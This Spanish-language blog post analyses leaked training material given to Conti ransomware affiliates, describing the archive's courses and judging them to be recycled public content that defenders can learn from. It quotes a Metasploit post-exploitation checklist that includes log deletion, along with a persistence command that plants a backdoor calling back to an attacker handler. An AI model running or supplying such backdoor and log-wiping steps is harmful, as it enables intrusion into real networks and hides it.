¿Qué contiene el “curso en ciberseguridad” que deben seguir los atacantes afiliados de Conti, el ransomware de éxito?

Un miembro de la banda Conti (en realidad quizás deberíamos hablar de programa de afiliación) publicó en agosto el material técnico y guías que deben seguir los afiliados para entrar en una compañía, robar todo lo posible y cifrar los datos. Una vez ahí, la organización Conti les extorsionará con publicar los datos si no pagan el rescate. Hemos echado un vistazo a esa información técnica con la que entrenan a los atacantes que entrarán en la red de la futura víctima. Con esto podemos entender qué consideran que es necesario para vulnerar una empresa hasta el punto de cifrar sus entrañas y, por tanto, cómo defendernos mejor.

Un poco de contexto

Esta persona parece un pentester enfadado por lo poco que le pagan por entrar en las redes de las empresas y por tanto comparte los servidores de Cobalt y el material de entrenamiento. Quien compartió esto ya hizo un pequeño análisis. Además de desvelar algunos de los C2C de Cobalt Strike donde las víctimas se conectan para comunicarse con su beacon. También filtró un “Manuals for hard workers and software.rar”, en el que se encuentran varios ficheros TXT con instrucciones. Lo curioso es que en ellos no hay nada del otro mundo. Pasos básicos conocidos por muchos para exfiltrar información con algunas curiosidades. Por ejemplo, que automatizan la subida de ficheros a Mega. También los típicos movimientos laterales, control de directorio activo, configurar redes Tor… un recetario muy sencillo fundamentalmente en PowerShell. En la imagen se resume el análisis de lo filtrado por esta persona.

Y además 30GB de material de entrenamiento técnico

Pero es que además, hace poco, se han filtrado 30GB de material de entrenamiento para los técnicos.

Hemos echado un vistazo al “training material”. La realidad es que, si bien no desvela complicados 0days o técnicas desconocidas, es cierto que sirve como un curso de ciberseguridad avanzado con todo un recetario para tener siempre a mano. No diríamos que contiene información especialmente desconocida. De hecho, es material que puede encontrarse en cualquier curso de ciberseguridad ofensiva. Su mayor valor, por tanto, está en la recopilación en sí, tanto en la cantidad como en la elección concreta del material seleccionado para los pentesters. Esto nos permite comprender cómo se explotan estos fallos en la vida real, en el del día a día del ransomware y cómo puede reaccionar la ciberseguridad de una compañía. Conociendo el recetario de los atacantes (que muchas de las veces atacarán de forma rutinaria sin variar mucho los ingredientes) se podría llegar a proteger más y mejor una red.

En los 30GB encontramos esta estructura de directorios.

Recetas en PowerShell, instrucciones precisas en TXT sobre cómo volcar bases de datos o recuperar nombres de usuarios de un directorio activo…

En el “training material leak”, con más de 30GB de información, podemos encontrar estas rutas básicas con su tamaño aproximado:

• * 2.1GB. 1. Crack 2019.rar. Dentro contiene un curso de ensamblador, de cracker y de reverser. Es un curso en Flash e incluye el software Flash Player Pro con una licencia pirata. Incluye decenas y decenas de ejemplos de código ensamblador y cómo compilarlo. El curso de cracker y reversing contiene muchos vídeos AVI comentados no profesionales en los que se enseña en ruso los rudimentos y mil ejemplos.

• * 4.4GB 10. Attacking and Defending Active Directory.rar. Contiene este documento:

Esos enlaces llevan a una zona privada de https://www.pentesteracademy.com, pero el curso incluye los vídeos descargados. También un TXT con un recetario.

Todos los docs tienen los mismos metadatos: Alexey Litvinenko (espía ruso envenenado con polonio en 2006) como autor y Grizzli777 como compañía. Al parecer es común en Words piratas.

• * 1.5GB 2.Metasploit US.rar. Este módulo son todo vídeos y pequeños TXT con recetas como esta:

Post

1. better understand the victim
2. escalation of privileges
3. deleting logs and monitoring programs
4. data collection and exploitation
5. anchoring and entrances
6. pivot network

Post

5. anchoring and entrances

meterpretor > run persistence -h

meterpretor > run persistence -A  -L c:\\ -X -i 10 -p 443 -r 192.168.2.140

Con curiosidades como exploits para XP.

• 5.3GB 4.Network Pentesting.rar. Contiene estos directorios autoexplicativos:

Dentro, todos son vídeos, esta vez de cursos privados de SecurityTube.

Algunos títulos de vídeos:

• * 1.1GB 5.Cobalt Strike.rar. Todo vídeos. Con cabeceras al estilo Marvel como esta:

Un vídeo específico es para el fallo ZeroLogon 2020-1472.

• 1.7GB 6.Powershell for Pentesters.rar. Más y más vídeos con todo tipo de trucos de Powershell. Todos de SecurityTube.

• 0.6GB 7. Windows Red Team Lab.rar. Muy poquitos vídeos y este TXT

• 1.6GB 8. WMI Attacks and Defense.rar. Algunos vídeos sobre el tema, impartidos por lasmismas persona de SecurityTube, pero con el logo de PentesterAcademy.com

• * 0.6GB 9. Abusing SQL Server Trusts in a Windows Domain.rar. Algunos vídeos y ciertas recetas:

• 6.2GB GeekBrayns Reverse Engineering.rar. En realidad es bastante material de la página https://gb.ru con vídeos, documentos y PPTs.

• 1GB GCB.zip. Parece un curso de cyberrange de PentesterAcademy, con vídeos.

Conclusiones

Todo un curso en el que fundamentalmente hay vídeos (muchos de ellos de varias horas). ¿Son clases especiales? No, es material de pentesterAcademy y securityTube principalmente. Le acompañan PDFs, la inmensa mayoría son las presentaciones usadas en el vídeo. También vemos algunos TXT con “recetas” y atajos y algunos documentos con enlaces a más información. Abarca desde el más bajo nivel (el curso de ensamblador es bastante extenso) hasta el AD. No hay más (ni tampoco menos). Es un curso completo de seguridad ofensiva muy orientado a entrar en un sistema y realizar la operativa esencial antes del cifrado, todo sacado de fuentes públicas o privados pero de ninguna forma revela algo nuevo más allá del esfuerzo de la recopilación.